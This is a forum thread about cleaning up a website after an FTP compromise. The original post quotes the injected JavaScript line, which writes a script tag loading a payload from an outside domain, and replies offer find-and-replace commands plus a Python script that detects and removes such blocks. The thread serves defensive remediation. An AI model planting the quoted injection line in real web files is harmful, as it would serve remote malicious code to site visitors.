Removing code injected into html, js, and php files

Discussion in 'Security' started by Yoav1, Apr 19, 2014.

  1. #1
    Hello everyone,

    I had my site attacked through FTP today (I blocked it now), and some code injected into HTML, JavaScript, and PHP files.

    Could you please tell me how to remove this code? Is there a tool that does this automatically?

    The code looks like this:

    /*8876fed*/

    document.write('<script type="text/javascript" src="http://www.nilgeor.de/gallery/hasdgf.php?id=981249768"></script>');

    /*8876fed*/

    The numbers are not consistent, and change in each file.
    Thanks!
     
    Yoav1, Apr 19, 2014 IP
  2. PoPSiCLe
    #2
    Well, any decent text-editor will handle find/replace in multiple files - since you're not telling us which system you're on, nor your knowledge level, it's a bit hard to tell exactly what to do, but it goes something like this (if you prefer Windows):
    Open the site in an FTP / SFTP session, select all the files, open them in your favorite text-editor (not Notepad, but something proper, like Notepad++ or Sublime or similar) and do a search/find/replace and remove all the malicious code - if the text/content differs, you might wanna do a manual replace, but that can get tedious quite quickly, if there are many files, so you might wanna use regular expressions to search for the content you're looking for.
     
    PoPSiCLe, Apr 22, 2014 IP
  3. Tier_net
    #3
    If you are running Linux and have MySQL installed, there is a nifty executable already in your path called "replace". It is handy for this type of stuff. In its basic form, it works like this:

    replace 'search-text' 'replace-text' -- files.php

    You can do it with multiple files:

    replace 'search-text' 'replace-text' -- *.php

    will replace the search text with the replace text in all php files in the directory. You can also use */*.php.

    It also uses regular expressions. Please first try this on a test file before you try it en masse:

    replace "document.write('<script type=\"text/javascript\" src=http://www.nilgeor.de/gallery/.+></script>');" '' -- testfile.php

    That will at least remove the JavaScript portion of it. You can probably figure out the rest from there (the .+ is a wildcard).
     
    Tier_net, May 20, 2014 IP
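
An added example (not code posted by anyone in this thread): a Python cleaner for the marker-delimited block shown in post #1, using Python's `re` module rather than the `replace` utility so that a backreference can match the id that changes per file. It assumes the injection always has the `/*id*/ ... /*id*/` form wrapping a remote `<script>` include; the function names and the file extensions scanned are choices made for this example.

```python
import re
import sys
from pathlib import Path

# /*<hex id>*/ ... /*<same hex id>*/ : the id changes per file, so capture it
# and require the identical value on the closing marker (backreference \1).
INJECTED = re.compile(rb"/\*([0-9a-f]{4,16})\*/(.{0,2048}?)/\*\1\*/[ \t]*\r?\n?", re.DOTALL)
# Guard against false positives: only drop a marker pair that wraps a remote script include.
REMOTE_SCRIPT = re.compile(rb"<script[^>]+src=[\"']?https?://", re.IGNORECASE)
EXTENSIONS = {".html", ".htm", ".js", ".php"}

def strip_injection(data: bytes):
    """Return (cleaned_bytes, removed_blocks) for one file's contents."""
    removed = []
    def drop(match):
        if REMOTE_SCRIPT.search(match.group(2)):
            removed.append(match.group(0))
            return b""
        return match.group(0)  # paired markers without a script include: keep
    return INJECTED.sub(drop, data), removed

def clean_tree(root, apply=False):
    """Report infected files under root; rewrite them only when apply=True."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in EXTENSIONS:
            continue
        # Work on bytes so line endings and encodings are left untouched.
        cleaned, removed = strip_injection(path.read_bytes())
        if removed:
            report[str(path)] = len(removed)
            if apply:
                path.write_bytes(cleaned)
    return report

if __name__ == "__main__":
    # Usage: python clean_injected.py /path/to/site [--apply]
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    hits = clean_tree(root, apply="--apply" in sys.argv[2:])
    for name, count in hits.items():
        print(f"{count} injected block(s): {name}")
```

Run it without `--apply` first to review the list of affected files, and work on a copy of the site rather than the live document root.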